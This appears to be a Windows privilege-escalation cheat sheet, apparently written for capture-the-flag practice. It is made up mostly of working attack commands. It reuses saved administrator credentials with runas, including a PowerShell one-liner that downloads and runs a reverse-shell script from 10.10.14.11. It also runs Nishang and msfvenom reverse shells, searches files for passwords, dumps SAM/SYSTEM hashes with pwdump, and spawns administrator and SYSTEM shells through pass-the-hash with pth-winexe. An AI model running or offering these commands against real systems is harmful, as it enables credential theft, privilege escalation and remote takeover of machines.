Check if there are stored credentials: cmdkey /list
#Suppose you find stored credentials for the user ACCESS/Administrator
#You can use this to run commands as administrator:
C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecred "C:\Windows\System32\cmd.exe /c TYPE C:\Users\Administrator\Desktop\root.txt > C:\Users\security\Desktop\root.txt"
#Or you can also use this to spawn a reverse shell: (Nishang shell not on victim machine)
runas /user:ACCESS\Administrator /savecred "powershell iex(new-object net.webclient).downloadstring('http://10.10.14.11/shell.ps1')"
#Or you can also use this to spawn a reverse shell: (Nishang shell on victim machine)
runas /user:ACCESS\administrator /savecred "powershell -ExecutionPolicy Bypass -File C:\Users\security\AppData\Local\Temp\Invoke-PowerShellTcp.ps1"
#msfvenom shell:
runas /user:ACCESS\administrator /savecred "C:\Temp\reverse.exe"
PASSWORDS IN FILES:
#Check if there is Unattend.xml file. It might contain passwords or other info. This file can be detected in winPEAS
#You can try manually querying the output:
dir /s *pass* == *.config
findstr /si password *.xml *.ini *.txt
#If you find the admin password then you can use winexe to login as admin:
winexe -U 'admin%pass' //10.10.10.10 cmd.exe
SAM & SYSTEM:
Windows stores password hashes in the Security Account Manager (SAM). These hashes are encrypted with a key which can found in SYSTEM file. You can use both of these files to extract the hashes if you have read permissions. Both of these files are located in C:\Windows\System32\config. These files are locked when windows is running. But you can find backup of these files at C:\Windows\Repair or C:\Windows\System32\RegBack directory.
#You can use samdump or pwdump to extract the hashes:
python pwdump.py SYSTEM SAM
#Crack the password using JTR or Hashcat
#Then use winexe to spawn a shell
PASS THE HASH:
Windows accepts hashes instead of passwords to authenticate to a number of services. We can use a modified version of winexe, pth-winexe to spawn a command prompt using admin user's hash.
#You dont need to crack the hashes.
pth-winexe -U 'admin%fullHash' //10.10.10.10 cmd.exe (This will give admin shell)
pth-winexe -U 'admin%fullHash' --system //10.10.10.10 cmd.exe (This will give system shell)
